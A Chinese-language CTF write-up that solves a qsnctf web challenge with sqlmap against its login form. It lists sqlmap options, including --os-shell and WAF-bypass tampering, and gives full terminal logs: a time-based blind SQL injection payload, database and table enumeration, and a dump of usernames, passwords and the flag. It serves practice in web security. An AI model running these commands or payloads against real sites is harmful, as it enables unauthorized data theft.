题解


根据题目提示,应为SQL注入,题目页面只有一个表单,用sqlmap进行表单注入。
使用--forms参数进行自动化表单注入,逐步得到flag。
### 总结参数作用:
-u 指定目标URL。
-C 指定列名(多个列用逗号分隔)。
-D 指定数据库名。
-T 指定表名。
-r 从文件加载请求,保留请求细节,自动识别注入点。
--columns 枚举指定表中的列。
--tables 枚举指定数据库中的表。
--dump 导出数据。
--dbs 枚举所有数据库 sqlmap -u URL --dbs
--level 测试深度(1-5) --level 3(检测Cookie注入)
--risk 风险等级(1-3) --risk 3(使用危险语句)
--proxy 使用代理 --proxy="http://127.0.0.1:8080"
--tamper 绕过WAF --tamper=space2comment
--forms 自动处理表单,用于自动发现表单并注入。
--batch 无需用户交互,自动选择默认选项。
--current-db 获取当前数据库名。
--dump-all 导出所有数据 sqlmap -u URL --dump-all
--os-shell 获取系统shell sqlmap -u URL --os-shell
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db_____H__ ___ ___[(]_____ ___ ___ {1.9.2#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:18:50 /2025-07-01/[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql'
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables_____H__ ___ ___[,]_____ ___ ___ {1.9.2#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:27:27 /2025-07-01/[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql'
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved:
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns_____H__ ___ ___["]_____ ___ ___ {1.9.2#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:29:34 /2025-07-01/[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql'
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| id | int(11) |
| password | text |
| username | text |
+----------+---------+
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump_____H__ ___ ___[.]_____ ___ ___ {1.9.2#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:33:55 /2025-07-01/[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql'
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password | username |
+----+----------------------------------------+----------+
| 1 | 123456 | admin |
| 2 | flag{ca74d097080346969f41c257318a7411} | user |
+----+----------------------------------------+----------+